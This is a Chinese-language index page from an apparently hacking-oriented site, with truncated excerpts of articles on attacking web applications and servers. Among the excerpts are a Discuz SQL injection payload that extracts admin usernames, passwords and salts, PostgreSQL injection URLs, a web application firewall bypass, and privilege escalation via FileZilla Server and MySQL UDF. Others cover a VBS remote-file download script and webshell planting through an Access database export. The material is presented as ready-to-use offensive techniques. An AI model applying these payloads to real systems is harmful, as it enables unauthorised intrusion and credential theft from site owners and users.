Discuz 1.5 - 2.0 二次注入细节(已出补丁) - 脚本漏洞
By:jannock 今天才发现,discuz 昨天又出补丁了。唉,又少一个玩了。这里说一下细节让大家共同学习一下吧。 在发表回复的地方输入注入语句: a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment=' 然...
简要分析最近的dedecms通杀漏洞以及漏洞补丁的绕过
话说文章写得菜不要紧,首先标题要跟大牛一样! 作者:单恋一支花 出自:t00ls 转载请注明出处,如有雷同,纯属别人抄袭,嘿嘿! 一:写在前面 今天晚上想老婆了,失眠了,蛋裂之余,进吐司寻找基友,惊现dedecms通杀漏洞,小菜我异常激动,奈何发表漏洞的大牛只给出exp没给出漏洞分析,看到论坛的部分童鞋还在苦思漏洞缘由,小菜我虽然菜,但是懂点php,所以前来献丑,广大童鞋勿喷! 二:php也有抽的...
绕过 dotDefender 防火墙方法 - 绕过 dotDefender 防火墙SQL注入
By:冰的原点 注:好久没发文了,我看了下这个文档的时间,显示是09年12月的!前些天某牛让我帮看这个防火墙的网站的时候,发现以前的方法其实还是可以用的,但目标站不仅有 dotDefender,还有个webknight,所以暂时想不出有啥好的方法。菜文发出来,牛牛们一起来支招吧! 以下是笔记内容: 这个防火墙比起那个webkingnt要强大的多,以前一直没听说过有什么方法绕过的! 经过BS牛的提醒...
PostgreSQL注入整理
/*order by猜字段数*/ https://www.webshell.cc/detail.php?id=236+order+by+26– /*判断postgresql数据库*/ https://www.webshell.cc/detail.php?id=236+and+1::int=1– /*通过cast类型转换来暴postgresql信息*/ https://www.webshell.cc/de...
postgresql注入和管理小记
Author:LengF PostTime:2011-08-17 相信大家平时关注最多的是Mysql和MSSQL,当然了Oracle也已经备受关注。但是一些比较“少见”的数据库,比如DB2,Postgresql,Sybase ASE,Informix。如果不知道这些数据库的特性就没办法谈注入和管理了。那么本文只是个人学习笔记的一部分,因为碰到了Postgresql了所以就认真看了官方相关文档及一些...
FileZilla Server提权
FileZilla Server应该好多牛人都知道怎么提权的了吧,很简单的,我再啰嗦一次 管理员密码以及端口都是保存在FileZilla Server Interface.xml文件里的 FileZilla Server Interface.xml内容大致如下 <FileZillaServer> <Settings> <Item name="Last Server P...
实用vbs
转自:黑鹰小子 1.文件下载(无回显) echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe echo Set xPost = createObject(“Microsoft.XMLHTTP”) >>iget.v...
Discuz X2 SQL /Xpath最新注入漏洞
请求方式:POST 影响页面: https://www.webshell.cc/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes 参数:username 参数测试:and 1=1 攻击细节: username=1+and+1=1&cookietime=259...
Access导出一句话拿shell实战
目标站: https://www.webshell.cc 我艹,开头太简单了,直接啊D搞定一切,就连TM的管理员md5还那么弱智,让我跑出来了,囸!直接进后台: 看到数据库备份我笑了,哈哈哈!老方法本地备份突破下,结果发现丫的不行!目录是只读的。 不过图1中有执行SQL语句,重点来了: 执行代码: 1.create table cmd (a varc...
Mysql UDF提权
今天闲的无聊DEDECMS搞了几个站。没事做提权吧。真的很久很久没有玩这东西了。 测试经典的UDF.dll提权一次性成功。 dedecms的账号和密码都保存在data/common.inc.php里面;下载common.inc.php查看账号密码你懂的。 首先用菜刀上传UDF.php;然后输入账号密码啥的也就连接成功了。 作者: 二、适用场合:1.目标系统是Windows(Win2000,XP,W...